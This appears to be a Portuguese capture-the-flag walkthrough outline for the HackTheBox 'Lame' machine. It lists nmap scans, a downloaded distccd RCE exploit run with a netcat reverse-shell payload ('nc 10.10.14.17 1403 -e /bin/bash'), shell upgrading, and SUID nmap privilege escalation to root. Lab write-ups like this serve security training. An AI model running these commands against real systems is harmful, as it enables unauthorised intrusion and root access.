Lame
Referência em vídeo
Introdução Enumeração básica Tentativa FTP anônimo Tentativa de Exploit FTP vsftpd 2.3.4 Null session RPC com rpcclient Alterando o exploit FTP sem sucesso Explorando o serviço distcc v1 Escalação de privilégio via SUID Explorando SMB manualmente samba 3.0.20 Explorando SMB samba 3.0.20 com metasploit
Enumeração
sudo nmap_enum lame.htb | tee nmap_output.txt
sudo nmap -p- -Pn -T5 -n lame.htb | tee nmap_fullportstcp_output.txt
sudo nmap -sU -p 53,161,111,137,139,500,2049 -Pn lame.htb | tee nmap_udp_output.txt
sudo nmap -sS --script vuln -n -T5 -Pn lame.htb -p 21,22,139,445,3632 | tee nmap_vulns.txt
wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/261b638bb05d02b67b6ad67fa9cf3c74a73de6c6/distccd_rce_CVE-2004-2687.py
searchsploit vsftpd 2.3.4
Exploração
nc -nlvp 1403
python2 distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.17 1403 -e /bin/bash"
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
CTRL + Z
stty raw -echo; fg
reset
Escalação de privilégio
python -m http.server 80
wget http://10.10.14.17/4-privilege_escalation/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
suid nmap
/usr/bin/nmap --interactive
!whoami
!sh